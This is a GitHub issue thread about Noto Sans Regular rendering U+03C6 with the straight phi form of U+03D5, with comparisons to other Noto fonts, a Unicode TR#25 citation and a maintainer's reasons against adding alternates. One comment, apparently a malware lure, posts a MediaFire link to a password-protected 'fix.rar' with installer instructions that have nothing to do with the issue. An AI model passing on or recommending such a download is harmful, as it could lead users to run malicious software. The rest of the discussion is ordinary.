### ISSUE TITLE
Noto Sans: U+03C6 is shown with Capitel PHI (like U+03D5), instead of small phi

### ISSUE THREAD

**Issue by reforest8084** [notofonts/latin-greek-cyrillic#486]
## Defect Report

> Noto fonts can be obtained from https://notofonts.github.io/
> If you find a problem with a released font, then please use this template to file a defect report.
> Before filing your report, please check if the issue has been fixed in the latest development build. You can get development builds by finding the font family on https://notofonts.github.io/ and following the link to "Development builds".

### Title 
Noto Sans: U+03C6 is shown with Capitel PHI (like U+03D5), instead of small phi

### Font 
NotoSans-Regular.ttf

### Where the font came from, and when
  >   Site: https://fonts.google.com/noto/specimen/Noto+Sans
  >   Date: 2024-08-27

### Font Version
  > * Win -- 2.013

### OS name and version
  > Windows 11

### Application name and version
  > any

### Issue
U+03C6 is shown as U+03D5, instead of a typical small phi

### Character data
U+03C6

### Screenshot
![20240827_160336](https://github.com/user-attachments/assets/c8eae093-e4a9-49cd-9d90-d64e34101fb6)

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by reforest8084** [comment]
Why should I do this and how does that change the mistake/problem?

**Comment by DLasher106** [comment]
Additional info:

This error affects Noto Sans Roman. Italic is correct.

Noto Serif (Roman and Italic) is correct.

Noto Sans Mono has the opposite problem; U+03D5 is loopy.

![Untitled 1](https://github.com/user-attachments/assets/30607b88-c4b1-4e66-9bdf-bc653c444d14)

**Comment by reforest8084** [comment]
For me, this feels not like a different shape. As shown in comparison above U+03C6 is the same in all those fonts (...Sans|Mono|Serif) except the Noto Sans Regular. It's exact the same for U+03D5, just the other way round.

In **Noto Sans Math**, U+03C6 is correct, also in **Noto Sans Display**. (small "φ"(phi))
![20240829_093125](https://github.com/user-attachments/assets/767c09f5-58d0-4540-959a-b1c9ca03a33b)
![20240829_093228](https://github.com/user-attachments/assets/5c192b91-3ce5-467a-87b5-ae549ba75d8e)

Comparing with Arial Unicode the same: small phi is always shown as "φ"(phi) as a common standard.

**Comment by DLasher106** [comment]
[Unicode TR#25](http://unicode.org/reports/tr25/#%5B%7B%22num%22%3A40%2C%22gen%22%3A0%7D%2C%7B%22name%22%3A%22XYZ%22%7D%2C69%2C677%2C0%5D) says:

> Fonts used primarily for Greek text may use either glyph form for U+03C6, but fonts that also
> intend to support technical use of the Greek letters should use the loopy form to contrast
> with the straight form used for U+03D5.

It seems to me that Noto is “intended to support technical use” — the very presence of 03D5 confirms this. And you would not want users accidentally using 03C6 for the math symbol out of confusion.

**Comment by moyogo** [comment]
Noto Sans Math should be used for Math.

**Comment by moyogo** [comment]
@simoncozens Would it make sense to have a stylistic set substitution or a similar features to have a loopy U+03C6 in Noto Sans?

**Comment by simoncozens** [comment]
People always want to add new glyphs and stylistic alternates to support their preferred styles of glyph. These aren't free, they cost disk space on every system which ships Noto Sans/Serif, and there's a *lot* of those. I don't think a font should be infinitely customisable; designers have the right to choose what they think is the most appropriate design. Other fonts are available if the user doesn't like that choice.

**Comment by ArchangeGabriel** [comment]
What the point in having the same symbol in 03C6 and 03D5 though?
